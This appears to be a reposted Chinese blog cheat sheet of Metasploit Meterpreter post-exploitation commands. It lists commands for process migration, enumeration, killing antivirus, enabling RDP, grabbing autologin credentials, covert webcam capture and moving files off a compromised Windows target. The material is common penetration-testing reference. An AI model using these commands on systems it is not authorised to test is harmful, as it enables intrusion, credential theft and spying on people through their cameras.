Metasploit -- Meterpreter常用命令

原文链接: https://blog.csdn.net/l1028386804/article/details/85944005

原文链接:https://blog.csdn.net/l1028386804/article/details/85944005

PS:以下所有的命令都是在Metasploit-Meterpreter Shell下执行的。

一、进程迁移
1、获取目标机正在运行的进程
ps

2.查看Meterpreter Shell的进程号
getpid

3.将Meterpreter Shell进程绑定到其他进程中
migrate 要绑定到的进程id号

4.系统自动寻找合适的进程迁移
run post/windows/manage/migrate

二、系统命令
1.查看目标机的系统信息
sysinfo

2.查看目标机是否运行在虚拟机上
run post/windows/gather/checkvm

3.查看目标机最近的运行时间
idletime

4.查看目标机完整的网路设置
route

5.将当前会话放到后台
background

6.查看目标机器上已经渗透成功的用户名
getuid

7.关闭目标机杀毒软件
run post/windows/manage/killav

8.启动目标机的远程桌面协议
run post/windows/manage/enable_rdp

9.查看目标机的本地子网情况
run post/windows/manage/autoroute

10.列举当前有多少用户登录了目标机
run post/windows/gather/enum_logged_on_users

11.列举安装在目标机上的应用程序
run post/windows/gather/enum_applications

12.抓取目标机自动登录的用户名和密码
run post/windows/gather/credentials/windows)autologin

13.抓取目标机屏幕截图
load espia
screengrab
或者
screenshot

14.查看目标机有没有摄像头
webcam_list

15.打开目标机摄像头拍照
webcam_snap
此命令会将目标机摄像头拍照的图片,以图片的形式保存在攻击机的/root目录下

16.开启摄像头直播模式
webcam_stream
此命令会将目标机摄像头录制的视频,以html文件的形式保存在攻击机的/root目录下

17.进行目标机shell
shell

18.停止Meterpreter会话或者停止Shell会话返回Meterpreter
exit

三、文件系统命令
1.查看当前处于目标机的哪个目录
pwd或getwd

2.查看当前处于本地的哪个目录
getlwd

3.列举目标机当前目录中的所有文件
ls

4.切换目标机目录
cd

5.搜索C盘所有以.txt为扩展名的文件
search -f *.txt -d c:\
其中,-f参数用于执行搜索文件模式,-d参数用于指定在哪个目录下进行搜索

6.下载目标机C盘的test.txt文件到攻击机/root下
download c:\test.txt /root

7.上传攻击机root目录下的test.txt文件到目标机C盘下
upload /root/test.txt c:\
 

你可能感兴趣的:(metasploit,meterpreter,渗透测试)